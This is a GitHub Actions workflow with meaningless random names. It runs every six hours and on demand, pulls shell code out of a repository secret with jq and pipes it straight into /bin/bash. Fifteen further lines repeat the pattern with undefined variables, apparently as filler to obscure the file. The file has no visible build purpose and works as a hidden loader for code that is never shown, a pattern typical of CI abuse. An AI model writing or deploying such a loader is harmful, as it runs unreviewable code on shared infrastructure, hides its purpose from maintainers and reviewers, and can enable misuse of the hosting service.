name: shangwth

on:
  workflow_dispatch:
  schedule:
    - cron: '42 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shangwth
        env:
          dekq470: ${{ secrets.dekq470 }}
        run: |
          echo $dekq470 | jq -r .matyh50 | /bin/bash
          echo $bqkv1 | jq -r .kygl95 | /bin/bash
          echo $pimec2 | jq -r .giny3 | /bin/bash
          echo $buio366 | jq -r .oieg5 | /bin/bash
          echo $jo938 | jq -r .ixbp4 | /bin/bash
          echo $n2922 | jq -r .omtw272 | /bin/bash
          echo $yyxlh4 | jq -r .fc560 | /bin/bash
          echo $w951 | jq -r .nwi264 | /bin/bash
          echo $osood361 | jq -r .v719 | /bin/bash
          echo $bbyc175 | jq -r .trwx39239 | /bin/bash
          echo $i42383 | jq -r .muuvf87480 | /bin/bash
          echo $g58 | jq -r .v58 | /bin/bash
          echo $qqj93640 | jq -r .mlg17 | /bin/bash
          echo $wo04 | jq -r .eyexh9911 | /bin/bash
          echo $ehzr63372 | jq -r .fbld30 | /bin/bash
          echo $jgsv04 | jq -r .m936 | /bin/bash

